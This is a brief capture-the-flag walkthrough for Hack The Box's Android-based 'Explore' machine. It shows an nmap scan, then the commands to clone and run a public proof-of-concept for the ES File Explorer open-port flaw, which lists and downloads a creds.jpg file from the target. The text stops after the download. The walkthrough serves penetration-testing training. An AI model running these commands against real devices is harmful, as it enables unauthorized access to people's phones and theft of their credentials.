"Explore" is a Capture the Flag challenge that we'll be solving today. (HTB) Hack the Box is where you can get your hands on one, this box is based on ADB (Android Debug Bridge). So, let’s get started and learn how to break it down successfully. So, let's get started and learn how to split it down effectively.

Pentesting Methodology

· Exploitation

· Privilege Escalation

Port Scanning & Enumeration

Nmap

Starting the full port scan

nmap -p- -sV 10.129.198.246

-p-: detect all ports

-sV: detect service version

According to the nmap output, we get

· on port 2222 SSH server running

· on port 59777 HTTP service running

· on port 5555 a TCP service running

While searching for port 59777 on the internet, we come up with the following GitHub as the first result

Exploitation

Copy the path from the GitHub URL to our Kali System so that we may get the file.

git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

cd ESFileExplorerOpenPortVuln

python poc.py

python poc.py list

There is a python exploit script that we can use to see if anything can be found. We get the creds.jpg file, the name "creds" gives us an indication that it may include the credentials, which are the login id and password that may be used for SSH later on.

python poc.py --cmd listPics --ip 10.129.198.246

python poc.py -g /storage/emulated/0/DCIM/creds.jpg --ip 10.129.198.246